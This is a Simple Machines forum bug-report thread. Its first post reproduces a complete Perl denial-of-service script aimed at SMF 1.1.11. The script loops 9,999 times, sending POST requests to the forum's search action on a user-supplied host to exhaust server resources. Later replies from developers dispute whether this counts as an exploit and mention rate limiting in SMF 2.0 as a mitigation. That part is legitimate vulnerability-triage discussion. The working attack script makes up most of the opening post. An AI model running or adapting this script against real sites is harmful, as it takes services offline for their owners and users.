Text only | Text with Images

Simple Machines Community Forum

SMF Development => Bug Reports => Fixed or Bogus Bugs => Topic started by: KinG-InFeT on September 06, 2010, 03:52:18 AM

Title: [Exploit smf 1.1.11] Multiple search DDOS
Post by: KinG-InFeT on September 06, 2010, 03:52:18 AM
Code Select
######################################



[+] Exploit Title: Simple Machines Forums (SMF 1.1.11) Multiple Search DDOS



[+] Date: 2010-02-11



[+] Author: Ashiyane Digital Security Members (Cair3x)



[+] Software Link: http://www.simplemachines.org/



[+] Version: 1.1.11 And All Version



[+] Tested on: All



######################################

#!/usr/bin/perl

use IO::Socket;

print q{

##################################################

# He Smf Full Ver ha ha ha  Multiple Search DOS #

# Tested on SMF 1.1.11 - 1.1.11 #

# Created By Cair3x ! ;) #

##################################################



[ Script ]



};

$rand=rand(10);

print "Forum Host: ";

$serv = <stdin>;

chop ($serv);

print "Forum Path: ";

$path = <stdin>;

chop ($path);

for ($i=0; $i<9999; $i++)

{

$postit = "search=Cair3x+Cairex+Cair3x+Cair3x+Of+Iran+$x+ &search_terms=any&search_author=&search_forum=-1&search_time =0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=AS C&show_results=posts&return_chars=200";



$lrg = length $postit;



my $sock = new IO::Socket::INET (

PeerAddr => "$serv",

PeerPort => "80",

Proto => "tcp",

);

die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock;



print $sock "POST $path"."index.php?action=search2 HTTP/1.1n";

print $sock "Host: $servn";

print $sock "Accept: text/_xml,application/_xml,application/xhtml+_xml,text/html;q=0 .9,text/plain;q=0.8,image/png,*/*;q=0.5n";

print $sock "Referer: $servn";

print $sock "Accept-Language: en-usn";

print $sock "Content-Type: application/x-www-form-urlencodedn";

print $sock "Accept-Encoding: gzip, deflaten";

print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4n";

print $sock "Connection: Keep-Aliven";

print $sock "Cache-Control: no-cachen";

print $sock "Content-Length: $lrgnn";

print $sock "$postitn";

close($sock);



## Print a "+" for every loop

syswrite STDOUT, "+";

}

print "Forum Be Fuke Raft. Test Konid ...n";



[ / Script ]



######################################



BY : Cair3x [[email protected]]



Web Site : Ashiyane.org



Forum : Http://Ashiyane.org/forums/



[+] Greetz to All Ashiyane Digital Security Member (And Virangar Good Frinds)



######################################

fix?
Title: Re: [Exploit smf 1.1.11] Multiple search DDOS
Post by: KinG-InFeT on September 08, 2010, 08:08:43 AM
UP
Title: Re: [Exploit smf 1.1.11] Multiple search DDOS
Post by: Oya on September 08, 2010, 09:33:32 AM
cant fix this

this applies to any systm that does search when their isnt lots of servers to handel the load
Title: Re: [Exploit smf 1.1.11] Multiple search DDOS
Post by: Kindred on September 08, 2010, 11:25:30 AM
I am not sure if this counts as an "exploit", especially since the same sort of crap could be done by script to just about ANY site running a script with db search capability....
Title: Re: [Exploit smf 1.1.11] Multiple search DDOS
Post by: emanuele on November 13, 2011, 06:02:40 PM
Would it make sense to have a spamProtection like in SMF2?
Title: Re: [Exploit smf 1.1.11] Multiple search DDOS
Post by: Trekkie101 on August 18, 2012, 07:42:11 AM
SMF 2.0 stops this, also 1.1 can stop it with the form locks in the DB for high load.

Maybe just add a load average for searching in the default DB schema?

Else natural progression of the software has eradicated this, no longer a bug?
Text only | Text with Images